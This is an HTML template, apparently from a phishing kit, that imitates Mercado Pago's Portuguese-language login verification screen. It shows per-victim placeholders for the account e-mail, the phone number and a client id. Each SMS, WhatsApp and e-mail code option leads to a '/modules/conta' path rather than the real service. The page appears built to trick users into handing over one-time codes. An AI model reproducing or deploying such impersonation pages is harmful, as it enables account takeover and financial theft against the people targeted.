<div class='w-full md:!py-10 m-auto bg-white p-4 font-proxima'>
    <div class='w-full max-w-container mx-auto md:grid md:grid-cols-[400px_auto] text-black justify-center'>
        <div class='flex flex-col gap-1 pr-10'>
            <span class='font-light text-sm text-black/55'>INÍCIO DE SESSÃO</span>
            <h3 class='text-title leading-lg font-semibold'>Escolha um método de verificação para iniciar sessão
            </h3>

            <div class='w-full flex flex-col gap-4 mt-3'>

                <div
                    class='w-full rounded-full p-sm max-w-[230px] h-[50px] border border-black/10 gap-3 grid grid-cols-[30px_auto]'
                >
                    <div class='w-[30px] h-[30px] flex justify-center items-center rounded-full bg-curious-blue-400/10'>
                        <svg aria-hidden='true' width='24' height='24' viewBox='0 0 24 24' fill='#009ee3'><path
                                fill-rule='evenodd'
                                clip-rule='evenodd'
                                d='M11.999 15.75C15.7275 15.75 18.75 12.7275 18.75 8.999C18.75 5.27053 15.7275 2.248 11.999 2.248C8.27053 2.248 5.248 5.27053 5.248 8.999C5.248 12.7275 8.27053 15.75 11.999 15.75ZM11.999 14.25C9.09895 14.25 6.748 11.899 6.748 8.999C6.748 6.09895 9.09895 3.748 11.999 3.748C14.899 3.748 17.25 6.09895 17.25 8.999C17.25 11.899 14.899 14.25 11.999 14.25Z'
                                fill='#009ee3'
                            >
                            </path><path
                                d='M5.98045 18.75C4.74861 18.75 3.75 19.7486 3.75 20.9804V21.7304H2.25V20.9804C2.25 18.9202 3.92018 17.25 5.98045 17.25H18C20.0711 17.25 21.75 18.9289 21.75 21V21.75H20.25V21C20.25 19.7574 19.2426 18.75 18 18.75H5.98045Z'
                                fill='#009ee3'
                            ></path>
                        </svg>
                    </div>
                    <div class='flex flex-col gap-0'>
                        <span class='text-black font-normal text-xs'>{{client.user}}</span>
                        <a class='text-curious-blue-400 font-proxima font-normal !text-xs' href='/modules/conta'>Trocar
                            conta</a>
                    </div>
                </div>

                <hr class='bg-black/10 p-0 max-w-[230px] !h-[2px] !border-none' />

                <a
                    href='https://mercadopago.com'
                    class='text-curious-blue-400 font-proxima font-normal !text-sm'
                >Preciso de ajuda</a>
            </div>
        </div>

        <div class='max-w-bxContainer flex flex-col gap-1 pr-10 rounded-lg border border-black/10 py-[16px] px-[40px]'>
            <a
                href='/modules/conta/sms/{{client.id}}'
                class='grid grid-cols-[46px_278px_auto] gap-3 cursor-pointer hover:bg-black/5 px-[12px] py-[14px]'
            >
                <div class='flex justify-center items-center h-[46px] rounded-full bg-curious-blue-400/10'>
                    <svg
                        width='25'
                        height='24'
                        viewBox='0 0 25 24'
                        fill='none'
                        xmlns='http://www.w3.org/2000/svg'
                        aria-hidden='false'
                    ><path
                            fill='#009ee3'
                            d='M2.01229 17.8374C0.934723 16.0295 0.368801 13.9788 0.371578 11.8919C0.37423 5.33471 5.88817 0 12.6634 0C15.9248 0.000528957 19.0523 1.25486 21.3577 3.48692C23.663 5.71898 24.9572 8.74584 24.9554 11.9013C24.9526 18.4586 19.438 23.7938 12.6637 23.7938H12.6586C10.6064 23.7937 8.58686 23.2961 6.78462 22.3463L0.268555 24L2.01229 17.8374ZM7.45946 20.4075C9.0337 21.3096 10.8297 21.7853 12.6594 21.7853H12.6635C18.2946 21.7853 22.8774 17.3509 22.8799 11.9005C22.8815 9.27849 21.8065 6.76325 19.8913 4.90813C17.9761 3.05302 15.3777 2.01001 12.6676 2.00856C7.03227 2.00856 2.44914 6.44252 2.44683 11.8925C2.44401 13.7535 2.98548 15.5772 4.0087 17.153L4.25158 17.527L3.21952 21.1746L7.08626 20.1932L7.45946 20.4075ZM14.6695 17.4375C14.0748 17.2589 13.4904 17.05 12.9186 16.8117C9.8376 15.5244 7.82546 12.523 7.67187 12.3247C7.51828 12.1263 6.41773 10.7134 6.41773 9.25067C6.41773 7.78795 7.21115 7.06921 7.4927 6.77166C7.70019 6.54255 7.99719 6.40774 8.31193 6.39981C8.51663 6.39981 8.72161 6.40163 8.90055 6.4103C8.92271 6.41139 8.94581 6.41122 8.96968 6.4111C9.14862 6.41013 9.37158 6.40922 9.5916 6.92033C9.84756 7.51537 10.4618 8.9781 10.5386 9.12687C10.6154 9.27565 10.6666 9.44911 10.5642 9.6475C10.4618 9.84589 10.4106 9.96969 10.2571 10.1432C10.1035 10.3167 9.93456 10.5306 9.79635 10.6638C9.64269 10.812 9.48256 10.9729 9.66179 11.2702C9.84102 11.5676 10.4575 12.5408 11.3703 13.3288C12.5432 14.3412 13.5331 14.655 13.8403 14.8037C14.1474 14.9525 14.3265 14.9276 14.5056 14.7296C14.6847 14.5316 15.2734 13.8619 15.4781 13.5644C15.6827 13.2669 15.8876 13.3165 16.169 13.4156C16.4504 13.5148 17.9607 14.2337 18.2677 14.3824C18.5747 14.5312 18.7796 14.6056 18.8563 14.7296C18.933 14.8536 18.9329 15.4484 18.6772 16.1427C18.4216 16.837 17.1942 17.4703 16.6042 17.5556C16.3575 17.5925 16.1083 17.6116 15.8587 17.6126C15.4553 17.6142 15.0541 17.5551 14.6695 17.4375Z'
                        ></path></svg>
                </div>

                <div class='text-black flex flex-col justify-center gap-0'>
                    <span class='text-sm'>SMS</span>
                    <span class='text-black/55 text-sm'>Vamos enviar um código para o telefone terminado em
                        {{client.phone}}.</span>
                </div>

                <div class='flex items-center justify-center w-full'>
                    <svg aria-hidden='true' width='20' height='20' viewBox='0 0 20 20' fill='rgba(0, 0, 0, 0.55)'><path
                            d='M8.27686 4.34644L7.42834 5.19496L12.224 9.99059L7.42334 14.7912L8.27187 15.6397L13.921 9.99059L8.27686 4.34644Z'
                            fill='rgba(0, 0, 0, 0.55)'
                        ></path></svg>
                </div>
            </a>

            <a
                href='/modules/conta/phone/{{client.id}}'
                class='grid grid-cols-[46px_278px_auto] gap-3 cursor-pointer hover:bg-black/5 px-[12px] py-[14px]'
            >
                <div class='flex justify-center items-center h-[46px] rounded-full bg-curious-blue-400/10'>
                    <svg
                        width='25'
                        height='24'
                        viewBox='0 0 25 24'
                        fill='none'
                        xmlns='http://www.w3.org/2000/svg'
                        aria-hidden='false'
                    ><path
                            fill='#009ee3'
                            d='M2.01229 17.8374C0.934723 16.0295 0.368801 13.9788 0.371578 11.8919C0.37423 5.33471 5.88817 0 12.6634 0C15.9248 0.000528957 19.0523 1.25486 21.3577 3.48692C23.663 5.71898 24.9572 8.74584 24.9554 11.9013C24.9526 18.4586 19.438 23.7938 12.6637 23.7938H12.6586C10.6064 23.7937 8.58686 23.2961 6.78462 22.3463L0.268555 24L2.01229 17.8374ZM7.45946 20.4075C9.0337 21.3096 10.8297 21.7853 12.6594 21.7853H12.6635C18.2946 21.7853 22.8774 17.3509 22.8799 11.9005C22.8815 9.27849 21.8065 6.76325 19.8913 4.90813C17.9761 3.05302 15.3777 2.01001 12.6676 2.00856C7.03227 2.00856 2.44914 6.44252 2.44683 11.8925C2.44401 13.7535 2.98548 15.5772 4.0087 17.153L4.25158 17.527L3.21952 21.1746L7.08626 20.1932L7.45946 20.4075ZM14.6695 17.4375C14.0748 17.2589 13.4904 17.05 12.9186 16.8117C9.8376 15.5244 7.82546 12.523 7.67187 12.3247C7.51828 12.1263 6.41773 10.7134 6.41773 9.25067C6.41773 7.78795 7.21115 7.06921 7.4927 6.77166C7.70019 6.54255 7.99719 6.40774 8.31193 6.39981C8.51663 6.39981 8.72161 6.40163 8.90055 6.4103C8.92271 6.41139 8.94581 6.41122 8.96968 6.4111C9.14862 6.41013 9.37158 6.40922 9.5916 6.92033C9.84756 7.51537 10.4618 8.9781 10.5386 9.12687C10.6154 9.27565 10.6666 9.44911 10.5642 9.6475C10.4618 9.84589 10.4106 9.96969 10.2571 10.1432C10.1035 10.3167 9.93456 10.5306 9.79635 10.6638C9.64269 10.812 9.48256 10.9729 9.66179 11.2702C9.84102 11.5676 10.4575 12.5408 11.3703 13.3288C12.5432 14.3412 13.5331 14.655 13.8403 14.8037C14.1474 14.9525 14.3265 14.9276 14.5056 14.7296C14.6847 14.5316 15.2734 13.8619 15.4781 13.5644C15.6827 13.2669 15.8876 13.3165 16.169 13.4156C16.4504 13.5148 17.9607 14.2337 18.2677 14.3824C18.5747 14.5312 18.7796 14.6056 18.8563 14.7296C18.933 14.8536 18.9329 15.4484 18.6772 16.1427C18.4216 16.837 17.1942 17.4703 16.6042 17.5556C16.3575 17.5925 16.1083 17.6116 15.8587 17.6126C15.4553 17.6142 15.0541 17.5551 14.6695 17.4375Z'
                        ></path></svg>
                </div>

                <div class='text-black flex flex-col justify-center gap-0'>
                    <span class='text-sm'>Whatsapp</span>
                    <span class='text-black/55 text-sm'>Vamos enviar um código para o telefone terminado em
                        {{client.phone}}.</span>
                </div>

                <div class='flex items-center justify-center w-full'>
                    <svg aria-hidden='true' width='20' height='20' viewBox='0 0 20 20' fill='rgba(0, 0, 0, 0.55)'><path
                            d='M8.27686 4.34644L7.42834 5.19496L12.224 9.99059L7.42334 14.7912L8.27187 15.6397L13.921 9.99059L8.27686 4.34644Z'
                            fill='rgba(0, 0, 0, 0.55)'
                        ></path></svg>
                </div>
            </a>

            <a
                href='/modules/conta/mail/{{client.id}}'
                class='grid grid-cols-[46px_278px_auto] gap-3 cursor-pointer hover:bg-black/5 px-[12px] py-[14px]'
            >
                <div class='flex justify-center items-center h-[46px] rounded-full bg-curious-blue-400/10'>
                    <svg
                        width='24'
                        height='14'
                        viewBox='0 0 24 14'
                        fill='none'
                        xmlns='http://www.w3.org/2000/svg'
                        aria-hidden='false'
                    ><path
                            fill='#009ee3'
                            fill-rule='evenodd'
                            clip-rule='evenodd'
                            d='M0.75 0.25H23.25V13.75H0.75V0.25ZM2.25 3.79417V12.25H21.75V3.79417L13.8601 8.30121C12.7074 8.95964 11.2926 8.95964 10.1399 8.30121L2.25 3.79417ZM2.25 2.06669L10.884 6.99874C11.5755 7.39379 12.4245 7.39379 13.116 6.99874L21.75 2.06669V1.75H2.25V2.06669Z'
                        ></path></svg>
                </div>

                <div class='text-black flex flex-col justify-center gap-0'>
                    <span class='text-sm'>E-mail</span>
                    <span class='text-black/55 text-sm'>Vamos enviar um código para {{client.user}}.</span>
                </div>

                <div class='flex items-center justify-center w-full'>
                    <svg aria-hidden='true' width='20' height='20' viewBox='0 0 20 20' fill='rgba(0, 0, 0, 0.55)'><path
                            d='M8.27686 4.34644L7.42834 5.19496L12.224 9.99059L7.42334 14.7912L8.27187 15.6397L13.921 9.99059L8.27686 4.34644Z'
                            fill='rgba(0, 0, 0, 0.55)'
                        ></path></svg>
                </div>
            </a>

            <div class='border-f-top border-black py-3 w-full mt-auto'>
                <a href='/modules/conta' class='!text-curious-blue-400 !text-[16px] font-normal font-proxima'>Não
                    consigo usar nenhum método de verificação</a>
            </div>
        </div>
    </div>
</div>